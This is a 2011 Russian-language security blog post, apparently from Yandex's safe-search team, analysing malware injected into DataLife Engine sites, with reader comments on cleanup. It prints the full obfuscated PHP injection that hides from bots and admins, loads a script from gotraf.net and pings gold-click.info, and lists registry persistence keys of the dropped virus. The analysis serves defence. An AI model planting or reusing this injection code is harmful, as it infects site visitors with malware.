Блог о безопасности

Вредоносный код с gotraf.net

21 июля 2011, 17:50
Причиной заражения сайтов вредоносным кодом часто становится взлом систем управления контентом с последующим изменением их исходных кодов.

Мы обнаружили, что в последнее время стали чаще происходить случаи заражения сайтов, работающих на CMS DataLife Engine кодом, который добавляет на страницу тег <script>. Пример кода, которым происходит заражение:


<? $GLOBALS['_dleget_']=Array(base64_decode('' .'cHJlZ19' .'tYX' .'RjaA=='),base64_decode('cH' .'JlZ19' .'tYXRjaA=='),base64_decode('cHJlZ19tY' .'XRjaA==')); ?><? function dleget($i){$a=Array('ZGxlX3Bhc3N3b3Jk','L3lhbmRleC9p','SFRUUF9VU0VSX0FHRU5U','L2dvb2dsZS9p','SFRUUF9VU0VSX0FHRU5U','L2JvdC9p','SFRUUF9VU0VSX0FHRU5U', PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly9nb3RyYWYubmV0L2luLnBocD9pZD0xMTEiPjwvc2NyaXB0Pg== ');return base64_decode($a[$i]);} ?><? if((!isset($_COOKIE[dleget(0)]))and(!$GLOBALS['_dleget_'][0](dleget(1),$_SERVER[dleget(2)]))and(!$GLOBALS['_dleget_'][1](dleget(3),$_SERVER[dleget(4)]))and(!$GLOBALS['_dleget_'][2](dleget(5),$_SERVER[dleget(6)]))){echo dleget(7);} if(isset($_SERVER["HTTP_HOST"])){ $host = str_replace("www.","",$_SERVER["HTTP_HOST"]); file_get_contents('http://gold-click.info/tds.php?jkdptbw='.$host);} ?>


Данный код проверяет, установлены ли cookie с именем dle_password и присутствуют ли в значении HTTP-заголовка User-Agent следующие строки:
  • yandex
  • google
  • bot

Если cookie с именем dle_password не установлены и в значении HTTP заголовка User-Agent не присутствует строк yandex, google или bot, то в код страницы вставляется:

<script src=http://gotraf.net/in.php?id=<id>
где <id> – трёхзначное число.

Общие рекомендации, как удалить со страницы вредоносный код и больше не дать его разместить, описаны в соответствующем разделе помощи. Узнать подробности о том, какие страницы заражены, можно, зарегистрировав заражённый сайт на Яндекс.Вебмастере.

При посещении сайта, который использует CMS, зараженную данным серверным скриптом, в браузере автоматически исполняется браузерный скрипт, подгружаемый с хоста gotraf.net. Этот браузерный скрипт пытается эксплуатировать уязвимости в популярных браузерах и сторонних продуктах. При удачной эксплуатации хотя бы одной из уязвимостей на компьютер пользователя загружается и устанавливается вредоносное ПО.

По данным с virustotal.com, на 19.07.2011 вредоносное ПО с хоста gotraf.net детектировалось только антивирусами:

Хэши вредоносного файла:
  • MD5: c852cb73a67be8080b292577e77349d0 ;
  • SHA1: d66db7ab31b5b6ac83cb17b58e40f1eca3acc2d9 ;
  • SHA256: d01d44972e2e853907ec0f6acaa9ff60bb797825c0dd107655f1b963c70ce2a1 .

Вирус блокирует работу операционной системы, копирует себя в папку C:\Program Files\Common Files\ с именем winlogin.exe, а также создает 2 записи в реестре, чтобы при каждом последующем старте операционной системы происходил его запуск.

Записи в реестре:
  • HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Winlogon\Shell = Explorer.exe "C:\Program Files\Common Files\winlogin.exe" ;
  • HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run\winlogin = "C:\Program Files\Common Files\winlogin.exe" .

Для удаления вируса с компьютера пользователя вручную, нужно удалить соответствующие записи в реестре, а также файл winlogin.exe (не перепутайте с winlogon.exe) .

Чтобы удалить вирус, можно также воспользоваться бесплатными утилитами от Лаборатории Касперского и DrWeb, приведёнными в этом разделе.

Как выбрать и настроить браузер, антивирус, брандмауэр, ОС компьютера, чтобы обеспечить максимальную безопасность работы в Интернете – описано здесь.

Команда безопасного поиска Яндекса

17 комментариев
Подписаться на комментарии к посту

В комп эта дрянь редко попадает. Сегодня удалял с двух сайтов. Застревает в модуле переходы. А там кодируеться в base64. Так и висит пока не вычистить все переходы и кеш сайта

Тоесть после удаления переходов и после чистки кеша вирус пропадает, а следов но больше негде не оставляет?

Удали базу переходов и вычисти кеш сайта. Гадость пропасть должна. Но лучше и модуль снести. В нём столько дырок что снова прилетит чегонибудь

Спасибо! Но это не помогло! Яндекс и гугл пишут, что вредоносного кода нет, а переход с сайта http://gotraf.net с загадочной буквой "g" снова был!

Адрес сайта скинь. Посмотрим что и как

http://BLEEED.Ru я уже снес модуль!

Сайт чистый. Это с кеша гугла бяка лезет. Ещё пару тройку деньков и пропадут переходы с этой ссылкой.

Это точно! У Вас антивирь молчит?

У меня его нету. Зачем антивирь если я смотрю через. Links  текстово-графический браузер. Код чистый. Да и с оперы тоже не вижу ни чего подозрительного

Спасибо, что утешили) Я тоже проверял код ничего не нашел!

Скоро новый поток пойдёт. Я уже одного вредителя отловил. Гдето в коментах есть. Да и хозяин модуля болван. Сам не знает как перекрыть такие запросы ))

Это разве ответ разработчика. Я просто валяюсь. Помимо скритпов и айфреймов есть ещё много гадости.

ko1yan

Подозрительными переходы являются содержащие в себе

Яндекс - Вы молодцы! Так все подробно объяснили, будем знать, как справляться с подобными вирусами. Опыт безценен!

Владислав
26 июля 2011, 20:00

А это оплаченые линки на антивирус, или вы не все антивирусы указали, у меня нарпимер NOD32 ловит все подобные вещи...

Нет, не оплаченные. 19.07 проверили полученный сэмпл через virustotal.com – его детектировали только указанные антивирусы. Сейчас, наверное, его научились детектировать и другие.
Вот вам рассадник заразы Посидел с пол часика и нарыл _http://intrawebik.narod.ru/g.js_

Остальное тут. В коде _http://paste.org.ru/?fyahqc_
И без кода в чистом виде _http://paste.org.ru/?kevn9f_

Спасибо!

Да не за что.  Увижу ещё чего нибудь. Поделюсь.